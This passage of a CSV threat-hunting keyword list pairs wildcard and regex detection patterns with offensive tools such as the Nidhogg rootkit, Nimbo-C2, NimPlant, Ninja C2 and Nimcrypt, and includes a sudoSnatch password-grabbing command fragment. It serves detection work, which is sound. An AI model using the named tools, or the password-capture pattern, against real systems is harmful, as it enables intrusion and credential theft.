"*Nidhogg::RegistryUtils::NidhoggRegistryUnhideValue*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryUnhideValue.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 
- T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryUnprotectValue*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryUnprotectValue.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg-0.1.zip*",".{0,1000}Nidhogg\-0\.1\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - 
T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg-0.2.zip*",".{0,1000}Nidhogg\-0\.2\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg-0.3.zip*",".{0,1000}Nidhogg\-0\.3\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - 
T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg-0.4.zip*",".{0,1000}Nidhogg\-0\.4\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg-0.5.zip*",".{0,1000}Nidhogg\-0\.5\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - 
T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*NidhoggClient.exe *",".{0,1000}NidhoggClient\.exe\s.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*NidhoggExample.cpp*",".{0,1000}NidhoggExample\.cpp.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red 
teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg-master*",".{0,1000}Nidhogg\-master.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*nIFS=* read -s pass\necho -e *User=*$(whoami)*Password=*$pass*> 
/var/tmp*",".{0,1000}nIFS\=.{0,1000}\sread\s\-s\spass\\necho\s\-e\s.{0,1000}User\=.{0,1000}\$\(whoami\).{0,1000}Password\=.{0,1000}\$pass.{0,1000}\>\s\/var\/tmp.{0,1000}","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and immediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*nightCrawler.ps1 *",".{0,1000}nightCrawler\.ps1\s.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*Nightmangle-master*",".{0,1000}Nightmangle\-master.{0,1000}","offensive_tool_keyword","Nightmangle","Nightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","117","14","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*nikto -C all *",".{0,1000}nikto\s\-C\sall\s.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "*nikto/program*",".{0,1000}nikto\/program.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" 
"*NimBlackout*.exe*",".{0,1000}NimBlackout.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*NimBlackout.*",".{0,1000}NimBlackout\..{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*NimBlackout-main*",".{0,1000}NimBlackout\-main.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*nimbo_main*",".{0,1000}nimbo_main.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*nimbo_prompt_color*",".{0,1000}nimbo_prompt_color.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*nimbo_root*",".{0,1000}nimbo_root.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*Nimbo-C2 w1ll r0ck y0ur w0rld*",".{0,1000}Nimbo\-C2\sw1ll\sr0ck\sy0ur\sw0rld.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*Nimbo-C2*",".{0,1000}Nimbo\-C2.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*Nimbo-C2.*",".{0,1000}Nimbo\-C2\..{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - 
TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*nimbo-dependencies*",".{0,1000}nimbo\-dependencies.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*nimbuspwn.py*",".{0,1000}nimbuspwn\.py.{0,1000}","offensive_tool_keyword","POC","This is a PoC for Nimbuspwn a Linux privilege escalation issue identified by Microsoft as originally described in https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ (CVE-2022-29799 and CVE-2022-29800)","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/Immersive-Labs-Sec/nimbuspwn","1","1","N/A","N/A","1","22","7","2022-05-05T10:02:27Z","2022-04-27T13:04:33Z" "*nimcrypt -*",".{0,1000}nimcrypt\s\-.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","8","707","118","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" "*nimcrypt --file *",".{0,1000}nimcrypt\s\-\-file\s.{0,1000}","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","0","N/A","N/A","1","90","7","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z" 
"*nimcrypt.nim*",".{0,1000}nimcrypt\.nim.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","8","707","118","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" "*NimDllSideload-main*",".{0,1000}NimDllSideload\-main.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","9","2","157","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z" "*NimExec.exe*",".{0,1000}NimExec\.exe.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","357","39","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z" "*NimExec-master*",".{0,1000}NimExec\-master.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","357","39","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z" "*NimPlant v*",".{0,1000}NimPlant\sv.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*nimplant-*",".{0,1000}nimplant\-.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - 
TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*NimPlant*.tar.gz*",".{0,1000}NimPlant.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*NimPlant*.zip*",".{0,1000}NimPlant.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*nimplant.db*",".{0,1000}nimplant\.db.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*NimPlant.dll*",".{0,1000}NimPlant\.dll.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*NimPlant.nim*",".{0,1000}NimPlant\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*NimPlant.nimble*",".{0,1000}NimPlant\.nimble.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written 
in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*NimPlant.py*",".{0,1000}NimPlant\.py.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*nimplantPrint*",".{0,1000}nimplantPrint.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*nimplants-*.js*",".{0,1000}nimplants\-.{0,1000}\.js.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*nimplants.html*",".{0,1000}nimplants\.html.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*NimShellCodeLoader*",".{0,1000}NimShellCodeLoader.{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","594","111","2023-12-28T15:23:19Z","2021-01-19T15:57:01Z" "*NimSyscallLoader -*",".{0,1000}NimSyscallLoader\s\-.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*Ninja c2*",".{0,1000}Ninja\sc2.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*ninjac2*",".{0,1000}ninjac2.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*nipe.pl *",".{0,1000}nipe\.pl\s.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway. Tor enables users to surf the internet. chat and send instant messages anonymously. and is used by a wide variety of people for both licit and illicit purposes. Tor has. for example. been used by criminals enterprises. 
hacktivism groups. and law enforcement agencies at cross purposes. sometimes simultaneously. Nipe is a script to make the Tor network your default gateway. This Perl script enables you to directly route all your traffic from your computer to the Tor network through which you can surf the internet anonymously without having to worry about being tracked or traced back.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","0","N/A","N/A","10","1833","307","2024-01-28T17:07:21Z","2015-09-07T18:47:10Z" "*nircmdc.exe savescreenshot*",".{0,1000}nircmdc\.exe\ssavescreenshot.{0,1000}","offensive_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - 